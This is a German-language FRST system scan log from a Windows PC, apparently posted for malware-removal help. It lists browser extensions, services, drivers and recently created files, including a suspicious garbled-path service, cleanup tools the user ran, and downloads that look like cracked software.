G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-06-26] CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2 CHR Extension: (Google Präsentationen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-10-03] CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2014-10-03] CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-10-03] CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-10-03] CHR Extension: (Google-Suche) - C:\Users\Kenny 
G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-10-03] CHR Extension: (ZenMate Security, Privacy & Unblock VPN) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2015-07-27] CHR Extension: (Google Tabellen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-10-03] CHR Extension: (Google Text & Tabellen Offline) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-18] CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-26] CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-10-03] CHR Extension: (Google Mail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-10-03] CHR HKLM-x32\...\Chrome\Extension: [ccahoghmggldkcdjiebjkidpfongdfbl] - <kein Path/update_url> ==================== Dienste (Nicht auf der Ausnahmeliste) ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 avgfws; C:\Program Files (x86)\AVG\AVG2015\avgfws.exe [1560592 2015-08-24] (AVG Technologies CZ, s.r.o.) R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3637160 2015-08-24] (AVG Technologies CZ, s.r.o.) R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [335656 2015-08-24] (AVG Technologies CZ, s.r.o.) 
R2 CGVPNCliService; C:\Program Files\CyberGhost 5\Service.exe [63968 2015-05-21] (CyberGhost S.R.L)
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd)
S2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [15122208 2013-10-18] (NVIDIA Corporation)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2014-01-15] ()
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)
R2 WtuSystemSupport; C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [1205136 2015-08-26] ()
S2 LavasoftTcpService; C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [X]
S2 SearchProtectionService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [X]
R2 zuroluxy; C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [162784 2015-03-11] (AVG Technologies CZ, s.r.o.)
R1 Avgfwfd; C:\Windows\System32\DRIVERS\avgfwd6a.sys [77760 2015-07-09] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [313264 2015-08-19] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [297904 2015-08-19] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [259040 2015-06-16] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [378336 2015-05-07] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [250800 2015-08-04] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [40928 2015-03-20] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [300464 2015-08-04] (AVG Technologies CZ, s.r.o.)
R1 cbfs3; C:\Windows\system32\drivers\cbfs3.sys [352144 2012-04-09] (EldoS Corporation)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2015-09-19] (Disc Soft Ltd)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [113880 2015-09-23] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-06-18] (Malwarebytes Corporation)
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [8192 2005-03-29] ()
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [39200 2013-09-28] (NVIDIA Corporation)
R0 SI3132; C:\Windows\System32\DRIVERS\SI3132.sys [90664 2007-10-03] (Silicon Image, Inc)
R0 SiFilter; C:\Windows\System32\DRIVERS\SiWinAcc.sys [22056 2007-10-03] (Silicon Image, Inc)
R0 SiRemFil; C:\Windows\System32\DRIVERS\SiRemFil.sys [17448 2007-10-03] (Silicon Image, Inc)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-09-23 04:59 - 2015-09-23 04:59 - 00000000 ____D C:\Users\Kenny G\Downloads\FRST-OlderVersion 2015-09-23 04:58 - 2015-09-23 04:58 - 00068936 _____ C:\Users\Kenny G\AppData\Local\GDIPFONTCACHEV1.DAT 2015-09-22 06:36 - 2015-09-22 06:36 - 00001583 _____ C:\Users\Kenny G\Desktop\neu.txt 2015-09-21 18:38 - 2015-09-21 18:38 - 00028509 _____ C:\ComboFix.txt 2015-09-21 18:13 - 2011-06-26 08:45 - 00256000 _____ C:\Windows\PEV.exe 2015-09-21 18:13 - 2010-11-07 19:20 - 00208896 _____ C:\Windows\MBR.exe 2015-09-21 18:13 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00098816 _____ C:\Windows\sed.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00080412 _____ C:\Windows\grep.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00068096 _____ C:\Windows\zip.exe 2015-09-21 18:12 - 2015-09-21 18:38 - 00000000 ____D C:\Qoobox 2015-09-21 18:12 - 2015-09-21 18:36 - 00000000 ____D C:\Windows\erdnt 2015-09-21 18:10 - 2015-09-21 18:10 - 05635484 ____R (Swearware) C:\Users\Kenny G\Downloads\ComboFix.exe 2015-09-20 19:56 - 2015-09-20 19:56 - 00000000 _____ C:\Users\Kenny G\Desktop\Neues Textdokument.txt 2015-09-20 19:46 - 2015-09-20 19:46 - 00040674 _____ C:\Users\Kenny G\Desktop\AVG log.csv 2015-09-20 19:42 - 2015-09-20 19:35 - 00058541 _____ C:\Users\Kenny G\Desktop\FRST.txt 2015-09-20 19:42 - 2015-09-20 19:35 - 00044699 _____ C:\Users\Kenny G\Desktop\Addition.txt 2015-09-20 19:42 - 2015-09-20 18:20 - 00054932 _____ C:\Users\Kenny G\Desktop\mbam-log-2015-09-20 (17-46-10).xml 2015-09-20 19:29 - 2015-09-20 19:30 - 00032570 _____ C:\Users\Kenny G\Desktop\GMER.txt 2015-09-20 19:19 - 2015-09-20 19:19 - 00380416 _____ C:\Users\Kenny G\Downloads\Gmer-19357.exe 2015-09-20 19:17 - 2015-09-20 19:35 - 00044699 _____ C:\Users\Kenny G\Downloads\Addition.txt 2015-09-20 19:16 - 2015-09-23 
04:59 - 00022927 _____ C:\Users\Kenny G\Downloads\FRST.txt 2015-09-20 19:15 - 2015-09-23 04:59 - 00000000 ____D C:\FRST 2015-09-20 19:14 - 2015-09-23 04:59 - 02192384 _____ (Farbar) C:\Users\Kenny G\Downloads\FRST64.exe 2015-09-20 19:14 - 2015-09-20 19:14 - 00000476 _____ C:\Users\Kenny G\Downloads\defogger_disable.log 2015-09-20 19:14 - 2015-09-20 19:14 - 00000000 _____ C:\Users\Kenny G\defogger_reenable 2015-09-20 19:13 - 2015-09-20 19:13 - 00050477 _____ C:\Users\Kenny G\Downloads\Defogger.exe 2015-09-20 19:07 - 2015-09-20 19:07 - 00000000 ____D C:\Users\Kenny G\Desktop\Festplatte 2015-09-20 19:00 - 2015-09-20 19:00 - 03237248 _____ (Enigma Software Group USA, LLC.) C:\Users\Kenny G\Downloads\SpyHunter-Installer.exe 2015-09-20 18:19 - 2015-09-20 18:19 - 00004680 _____ C:\Users\Kenny G\Desktop\JRT.txt 2015-09-20 18:00 - 2015-09-20 18:00 - 01798976 _____ (Malwarebytes) C:\Users\Kenny G\Downloads\JRT.exe 2015-09-20 17:43 - 2015-09-23 04:58 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2015-09-20 17:42 - 2015-09-20 17:42 - 00001157 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 2015-09-20 17:42 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2015-09-20 17:42 - 2015-06-18 08:41 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2015-09-20 17:42 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2015-09-20 17:36 - 2015-09-20 17:38 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Kenny G\Downloads\mbam-setup-2.1.8.1057.exe 2015-09-20 17:36 - 2015-09-20 17:37 - 01662976 _____ C:\Users\Kenny G\Downloads\AdwCleaner_5.008.exe 2015-09-19 
17:25 - 2015-09-21 18:10 - 00000000 ____D C:\Program Files (x86)\Trojan Remover 2015-09-19 17:14 - 2015-09-19 17:15 - 01457952 _____ C:\Users\Kenny G\Downloads\Trojan Remover - CHIP-Installer.exe 2015-09-19 17:11 - 2015-09-20 17:29 - 00000584 _____ C:\task.vbs 2015-09-19 16:17 - 2015-09-19 16:48 - 00000000 ____D C:\Windows\system32\MRT 2015-09-19 16:16 - 2015-09-19 16:16 - 00000000 ____D C:\Windows\system32\EventProviders 2015-09-19 16:02 - 2015-07-29 09:23 - 00000000 ____D C:\Users\Kenny G\Desktop\Steuerungs- und Regeltechnik 2015-09-19 15:37 - 2015-09-19 15:37 - 00001494 _____ C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2015-09-19 12:25 - 2015-09-19 12:25 - 00000000 ___RD C:\MSOCache 2015-09-19 12:24 - 2015-09-19 12:24 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Disc_Soft_Ltd 2015-09-19 12:21 - 2015-09-21 19:35 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\DAEMON Tools Lite 2015-09-19 12:21 - 2015-09-19 12:23 - 00000000 ____D C:\Program Files\DAEMON Tools Lite 2015-09-19 12:21 - 2015-09-19 12:21 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys 2015-09-19 12:21 - 2015-09-19 12:21 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite 2015-09-19 12:15 - 2015-09-19 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913--- 2015-09-19 12:14 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hp.bak 2015-09-19 12:12 - 2015-09-20 01:26 - 00000000 ____D C:\Program Files (x86)\Could not connect. 
Error code = 0x-1442657579--- 2015-09-19 12:06 - 2015-09-19 12:12 - 00000000 ____D C:\ProgramData\Microsoft Toolkit 2015-09-19 11:42 - 2015-09-19 15:43 - 00000000 ____D C:\Users\Kenny G\Desktop\Neuer Ordner (3) 2015-09-19 11:35 - 2015-09-19 11:38 - 55791130 _____ C:\Users\Kenny G\Downloads\MS-PowerPoint-2013-ISO-and-Activator.zip 2015-09-19 11:07 - 2015-09-19 11:07 - 00000000 ____D C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform 2015-09-19 11:06 - 2015-09-19 16:06 - 00000000 ____D C:\ProgramData\Microsoft Help 2015-09-19 11:06 - 2015-09-19 11:06 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Microsoft Help 2015-09-13 21:57 - 2015-09-13 22:26 - 00000000 ____D C:\Users\Kenny G\Desktop\USB Lieder 2015-09-13 12:25 - 2015-09-13 12:30 - 327964808 _____ (Microsoft Corporation) C:\Users\Kenny G\Downloads\X16-32694.exe 2015-09-01 22:40 - 2015-09-01 22:40 - 00001666 _____ C:\Users\Kenny G\Desktop\Traktor.exe - Verknüpfung.lnk 2015-09-01 21:50 - 2015-09-01 21:58 - 241712938 _____ C:\Users\Kenny G\Downloads\Traktor_2_290_PC.zip 2015-09-01 21:43 - 2015-09-01 21:43 - 01260832 _____ C:\Users\Kenny G\Downloads\Traktor Pro 2 - CHIP-Installer.exe 2015-09-01 20:31 - 2015-09-01 20:31 - 00000000 ____D C:\Backup 2015-09-01 20:20 - 2015-08-07 22:21 - 00000000 ____D C:\Users\Kenny G\Desktop\Native.Instruments.TRAKTOR.2.v2.9.0.x86.x64-CHAOS 2015-08-31 23:34 - 2015-09-01 20:19 - 527315694 _____ C:\Users\Kenny G\Downloads\2.9.0.x86.x64-CHAOS.rar 2015-08-29 20:33 - 2015-08-29 20:34 - 00000000 ____D C:\ProgramData\Package Cache 2015-08-29 19:48 - 2015-09-21 19:34 - 00000000 ____D C:\Users\Kenny G\Desktop\Alles 2015-08-29 16:06 - 2015-08-30 01:38 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox ==================== Ein Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 
2015-09-23 04:54 - 2015-05-19 19:27 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job 2015-09-23 04:52 - 2009-07-14 06:45 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2015-09-23 04:52 - 2009-07-14 06:45 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2015-09-23 04:47 - 2013-10-01 21:23 - 01158110 _____ C:\Windows\WindowsUpdate.log 2015-09-23 04:44 - 2015-06-01 12:52 - 00000000 ____D C:\ProgramData\MFAData 2015-09-23 04:40 - 2015-05-19 19:27 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job 2015-09-21 18:38 - 2009-07-14 05:20 - 00000000 __RHD C:\Users\Default 2015-09-21 18:37 - 2009-07-14 19:58 - 00696832 _____ C:\Windows\system32\perfh007.dat 2015-09-21 18:37 - 2009-07-14 19:58 - 00148128 _____ C:\Windows\system32\perfc007.dat 2015-09-21 18:37 - 2009-07-14 07:13 - 01613340 _____ C:\Windows\system32\PerfStringBackup.INI 2015-09-21 18:32 - 2009-07-14 04:34 - 00000215 _____ C:\Windows\system.ini 2015-09-21 18:31 - 2013-11-03 19:09 - 00000000 ____D C:\ProgramData\NVIDIA 2015-09-21 18:31 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2015-09-20 19:14 - 2013-10-01 21:24 - 00000000 ____D C:\Users\Kenny G 2015-09-20 18:21 - 2015-06-01 11:16 - 00000000 ____D C:\AdwCleaner 2015-09-20 18:07 - 2015-08-07 11:34 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\Lavasoft 2015-09-20 18:07 - 2015-08-07 11:33 - 00000000 ____D C:\ProgramData\Lavasoft 2015-09-20 18:07 - 2015-08-07 11:33 - 00000000 ____D C:\Program Files (x86)\Lavasoft 2015-09-20 03:16 - 2013-10-02 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\vlc 2015-09-19 18:33 - 2013-10-03 21:25 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\Skype 2015-09-19 16:38 - 2015-05-12 22:45 - 00000000 ____D C:\Program Files\Microsoft Silverlight 2015-09-19 16:38 - 2015-05-12 22:45 - 00000000 ____D C:\Program Files 
(x86)\Microsoft Silverlight 2015-09-19 16:35 - 2015-05-12 22:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2015-09-19 16:07 - 2015-08-07 11:38 - 00003848 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1438940281 2015-09-19 16:07 - 2015-08-07 11:37 - 00000000 ____D C:\Program Files (x86)\Opera 2015-09-19 16:06 - 2009-07-14 05:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared 2015-09-19 15:37 - 2015-06-02 08:55 - 00000000 ____D C:\ProgramData\AVG2015 2015-09-19 15:37 - 2013-10-01 21:25 - 00001442 _____ C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk 2015-09-19 11:54 - 2014-11-11 21:45 - 00000000 ____D C:\Users\Kenny G\Desktop\schule 2015-09-19 11:17 - 2009-07-14 20:18 - 00000000 ____D C:\Windows\ShellNew 2015-09-16 20:19 - 2015-05-19 19:27 - 00004106 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70 2015-09-16 20:19 - 2015-05-19 19:27 - 00003854 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore1d0925912504720 2015-09-12 12:16 - 2014-01-15 20:58 - 00282296 _____ C:\Windows\SysWOW64\PnkBstrB.xtr 2015-09-12 12:16 - 2014-01-15 20:58 - 00282296 _____ C:\Windows\SysWOW64\PnkBstrB.exe 2015-09-12 12:14 - 2014-01-15 20:58 - 00215128 _____ C:\Windows\SysWOW64\PnkBstrB.ex0 2015-09-12 12:14 - 2013-12-08 04:01 - 00000000 ____D C:\Program Files (x86)\Steam 2015-09-09 10:54 - 2014-02-17 11:46 - 00000000 ____D C:\Users\Tabea Studium 2015-09-09 10:54 - 2013-12-14 00:05 - 00000000 ____D C:\Users\eLoot 2015-09-03 13:45 - 2013-10-26 19:41 - 00305664 ___SH C:\Users\Kenny G\Documents\Thumbs.db 2015-09-03 13:43 - 2015-08-13 02:23 - 00000946 _____ C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job 2015-09-03 13:43 - 2015-02-10 17:45 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job 2015-09-03 13:43 - 2015-02-10 17:45 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job 
2015-09-03 13:43 - 2014-11-14 16:21 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job 2015-09-03 13:43 - 2014-02-16 13:52 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2015-09-03 13:43 - 2014-02-16 13:52 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2015-09-02 22:17 - 2015-06-01 12:10 - 00003206 _____ C:\Windows\System32\Tasks\{AFE2C666-2C4F-49BB-B86B-2CC7B241F441} 2015-09-02 22:17 - 2015-02-10 17:45 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80 2015-09-02 22:16 - 2015-08-13 02:23 - 00003948 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier 2015-09-02 22:16 - 2015-02-10 17:45 - 00003866 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0 2015-09-02 22:16 - 2014-11-14 16:21 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90 2015-09-02 22:16 - 2014-02-16 13:52 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2015-09-02 22:16 - 2014-02-16 13:52 - 00003866 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2015-09-02 22:16 - 2014-02-16 03:10 - 00003300 _____ C:\Windows\System32\Tasks\{7AD56248-245F-4D20-B2FB-3A38DD4D9679} 2015-09-02 22:16 - 2013-10-01 22:01 - 00002778 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC 2015-09-01 22:34 - 2015-08-14 11:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments 2015-09-01 22:33 - 2015-08-14 11:07 - 00000000 ____D C:\Program Files\Native Instruments 2015-09-01 22:24 - 2015-08-14 11:07 - 00000000 ____D C:\Program Files\Common Files\Native Instruments 2015-09-01 22:17 - 2015-08-08 00:13 - 00000000 ____D C:\Users\Kenny G\Documents\Native Instruments 2015-08-30 01:38 - 2013-12-04 21:27 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2015-08-29 20:01 - 2014-06-19 18:04 - 00000000 ____D C:\Users\Kenny G\.thumbnails 2015-08-29 20:01 - 2009-10-14 08:04 - 00000000 ____D 
C:\Windows\Panther 2015-08-29 15:58 - 2015-08-14 11:07 - 00000000 ____D C:\ProgramData\Native Instruments 2015-08-29 09:26 - 2015-06-02 08:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG 2015-08-29 03:35 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\system32\NDF 2015-08-26 18:37 - 2009-10-14 07:12 - 134753440 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe 2015-08-26 11:33 - 2015-06-02 09:01 - 00000000 ____D C:\Program Files (x86)\AVG Web TuneUp ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2010-06-02 06:21 - 2010-06-02 06:21 - 1347354 _____ () C:\Program Files (x86)\Apr2005_d3dx9_25_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1078962 _____ () C:\Program Files (x86)\Apr2005_d3dx9_25_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1397830 _____ () C:\Program Files (x86)\Apr2006_d3dx9_30_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1115221 _____ () C:\Program Files (x86)\Apr2006_d3dx9_30_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0916430 _____ () C:\Program Files (x86)\Apr2006_MDX1_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 4162630 _____ () C:\Program Files (x86)\Apr2006_MDX1_x86_Archive.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0179133 _____ () C:\Program Files (x86)\Apr2006_XACT_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0133103 _____ () C:\Program Files (x86)\Apr2006_XACT_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0087101 _____ () C:\Program Files (x86)\Apr2006_xinput_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0046010 _____ () C:\Program Files (x86)\Apr2006_xinput_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0698612 _____ () C:\Program Files (x86)\APR2007_d3dx10_33_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0695865 _____ () C:\Program Files (x86)\APR2007_d3dx10_33_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1607358 _____ () C:\Program Files (x86)\APR2007_d3dx9_33_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1606039 _____ () C:\Program Files 
(x86)\APR2007_d3dx9_33_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0195766 _____ () C:\Program Files (x86)\APR2007_XACT_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0151225 _____ () C:\Program Files (x86)\APR2007_XACT_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0096817 _____ () C:\Program Files (x86)\APR2007_xinput_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0053302 _____ () C:\Program Files (x86)\APR2007_xinput_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1350542 _____ () C:\Program Files (x86)\Aug2005_d3dx9_27_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1077644 _____ () C:\Program Files (x86)\Aug2005_d3dx9_27_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0182903 _____ () C:\Program Files (x86)\AUG2006_XACT_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0137235 _____ () C:\Program Files (x86)\AUG2006_XACT_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0087142 _____ () C:\Program Files (x86)\AUG2006_xinput_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0046058 _____ () C:\Program Files (x86)\AUG2006_xinput_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0852286 _____ () C:\Program Files (x86)\AUG2007_d3dx10_35_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0796867 _____ () C:\Program Files (x86)\AUG2007_d3dx10_35_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1800160 _____ () C:\Program Files (x86)\AUG2007_d3dx9_35_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1708152 _____ () C:\Program Files (x86)\AUG2007_d3dx9_35_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0198096 _____ () C:\Program Files (x86)\AUG2007_XACT_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0153012 _____ () C:\Program Files (x86)\AUG2007_XACT_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0867612 _____ () C:\Program Files (x86)\Aug2008_d3dx10_39_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0849167 _____ () C:\Program Files (x86)\Aug2008_d3dx10_39_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 1794084 _____ () C:\Program Files (x86)\Aug2008_d3dx9_39_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 
1464672 _____ () C:\Program Files (x86)\Aug2008_d3dx9_39_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0121772 _____ () C:\Program Files (x86)\Aug2008_XACT_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0092996 _____ () C:\Program Files (x86)\Aug2008_XACT_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0271412 _____ () C:\Program Files (x86)\Aug2008_XAudio_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0271038 _____ () C:\Program Files (x86)\Aug2008_XAudio_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0919044 _____ () C:\Program Files (x86)\Aug2009_D3DCompiler_42_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 0900598 _____ () C:\Program Files (x86)\Aug2009_D3DCompiler_42_x86.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 3112111 _____ () C:\Program Files (x86)\Aug2009_d3dcsx_42_x64.cab 2010-06-02 06:21 - 2010-06-02 06:21 - 3319740 _____ () C:\Program Files (x86)\Aug2009_d3dcsx_42_x86.cab 